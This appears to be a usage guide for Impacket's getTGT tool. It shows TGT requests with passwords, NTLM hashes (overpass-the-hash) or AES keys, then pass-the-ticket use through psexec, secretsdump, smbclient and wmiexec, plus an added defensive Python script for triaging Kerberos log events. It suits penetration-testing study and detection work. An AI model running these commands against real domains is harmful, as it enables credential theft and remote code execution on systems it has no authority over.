Overview

impacket-getTGT requests a Ticket Granting Ticket (TGT) from a domain controller’s KDC. The TGT is saved as a .ccache file that can be used with other Kerberos-aware tools for pass-the-ticket attacks.
impacket-getTGT <DOMAIN>/<USER> [options]

Authentication Methods

With Password

impacket-getTGT domain.local/jdoe:'Password123' -dc-ip 10.10.10.1

With NTLM Hash (Overpass-the-Hash)

impacket-getTGT domain.local/jdoe -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -dc-ip 10.10.10.1
Full LM:NT format also works:
impacket-getTGT domain.local/jdoe -hashes aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -dc-ip 10.10.10.1

With AES Key

AES256:
impacket-getTGT domain.local/jdoe -aesKey 3c4a5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d -dc-ip 10.10.10.1
AES128:
impacket-getTGT domain.local/jdoe -aesKey 3c4a5e6f7a8b9c0d1e2f3a4b5c6d7e8f -dc-ip 10.10.10.1
An AES256 key is 64 hex chars (32 bytes); an AES128 key is 32 hex chars (16 bytes). Impacket picks the enctype from the key length.

Using the .ccache File

getTGT outputs a file named jdoe.ccache in the current directory. Set it as the active Kerberos credential cache:
export KRB5CCNAME=$(pwd)/jdoe.ccache
Verify the ticket:
klist

Using the TGT with Other Impacket Tools

Once KRB5CCNAME is set, use -k -no-pass to authenticate via Kerberos:
export KRB5CCNAME=$(pwd)/jdoe.ccache

# PSExec
impacket-psexec domain.local/jdoe@<TARGET_FQDN> -k -no-pass

# SecretsDump
impacket-secretsdump domain.local/jdoe@<TARGET_FQDN> -k -no-pass

# SMBClient
impacket-smbclient domain.local/jdoe@<TARGET_FQDN> -k -no-pass

# WMIExec
impacket-wmiexec domain.local/jdoe@<TARGET_FQDN> -k -no-pass
The target must be a hostname (FQDN), not an IP, when using Kerberos authentication.

Renewing Tickets

getTGT cannot renew an existing ticket — it has no -renew option and always performs a fresh AS-REQ using the supplied password/hash/AES key. To get a new TGT, just re-run it with credentials. Actual ticket renewal in Impacket is done with getST -renew.
# Re-request a fresh TGT (must re-supply credentials)
impacket-getTGT domain.local/jdoe:'Password123' -dc-ip 10.10.10.1

Common Errors

Error | Cause | Fix
--- | --- | ---
KRB_AP_ERR_SKEW | Clock difference > 5 minutes between attacker and DC | Sync time: sudo ntpdate -u <DC_IP>, or disable NTP and set the clock from the DC's HTTP Date header (command after the table)
KDC_ERR_PREAUTH_FAILED | Wrong password or hash | Verify credentials
KDC_ERR_C_PRINCIPAL_UNKNOWN | User does not exist | Check username and domain
KDC_ERR_CLIENT_REVOKED | Account disabled or locked | Account is unusable
KDC_ERR_ETYPE_NOSUPP | DC doesn’t support the encryption type | Try a different key type (password vs AES vs NTLM)
KRB_ERR_RESPONSE_TOO_BIG | KDC response exceeded the UDP size limit (user in many groups) | Impacket automatically retries over TCP, so no action is needed

# Alternative time sync for KRB_AP_ERR_SKEW (the DC must answer HTTP on port 80)
sudo timedatectl set-ntp off && sudo date -s "$(curl -sI http://<DC_IP> | grep -i '^date:' | cut -d' ' -f2-)"
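
Added example, not part of the original page or of Impacket: a defender-side triage of the domain controller's Security log for the AS requests covered under Authentication Methods and the errors in the table above. It assumes events 4768/4771 exported as dictionaries with the field names TargetUserName, Status, TicketEncryptionType and IpAddress, that an NT-hash request is logged with etype 0x17, and a caller-supplied set of accounts expected to use AES; the sample events are constructed.

```python
# Added example: triage of exported DC Security-log Kerberos events.
# Field names follow events 4768/4771; every event below is constructed.
ETYPES = {0x11: "AES128", 0x12: "AES256", 0x17: "RC4-HMAC"}  # Kerberos etypes
# RFC 4120 error numbers for the errors in this page's table
STATUS = {0x06: "KDC_ERR_C_PRINCIPAL_UNKNOWN", 0x0E: "KDC_ERR_ETYPE_NOSUPP",
          0x12: "KDC_ERR_CLIENT_REVOKED", 0x18: "KDC_ERR_PREAUTH_FAILED",
          0x25: "KRB_AP_ERR_SKEW", 0x34: "KRB_ERR_RESPONSE_TOO_BIG"}

SAMPLE_EVENTS = [  # constructed sample data
    {"EventID": 4768, "TargetUserName": "jdoe", "Status": "0x0",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.20"},
    {"EventID": 4768, "TargetUserName": "jdoe", "Status": "0x0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.50"},
    {"EventID": 4771, "TargetUserName": "jdoe", "Status": "0x18",
     "IpAddress": "::ffff:10.10.10.50"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "Status": "0x0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.30"},
    {"EventID": 4768, "TargetUserName": "ghost", "Status": "0x6",
     "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.10.10.50"},
]

def source_ip(event):
    """Drop the IPv4-mapped IPv6 prefix Windows puts on IpAddress."""
    ip = event["IpAddress"]
    return ip[7:] if ip.startswith("::ffff:") else ip

def triage(events, aes_accounts):
    """Return (user, source, reason) for failed AS exchanges and for TGTs
    issued with RC4 to accounts the caller expects to authenticate with AES."""
    findings = []
    for event in events:
        user = event["TargetUserName"].lower()
        status = int(event["Status"], 16)
        if status != 0:
            reason = STATUS.get(status, f"status {status:#x}")
        elif (event["EventID"] == 4768 and user in aes_accounts and
              ETYPES.get(int(event["TicketEncryptionType"], 16)) == "RC4-HMAC"):
            reason = "RC4-HMAC TGT for AES-baselined account"
        else:
            continue
        findings.append((user, source_ip(event), reason))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS, aes_accounts={"jdoe"}):
        print(*finding, sep="  ")
```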

Quick Reference

# Password
impacket-getTGT domain.local/jdoe:'Pass123' -dc-ip 10.10.10.1

# NTLM hash (overpass-the-hash)
impacket-getTGT domain.local/jdoe -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -dc-ip 10.10.10.1

# AES key
impacket-getTGT domain.local/jdoe -aesKey <AES256_KEY> -dc-ip 10.10.10.1

# Use the ticket
export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-psexec domain.local/jdoe@<TARGET_FQDN> -k -no-pass

Flag | Description
--- | ---
-hashes LMHASH:NTHASH | Authenticate with NTLM hash
-aesKey KEY | Authenticate with AES key
-dc-ip IP | Domain controller IP address
-k | Use Kerberos authentication
-no-pass | Don’t ask for password (use with -k)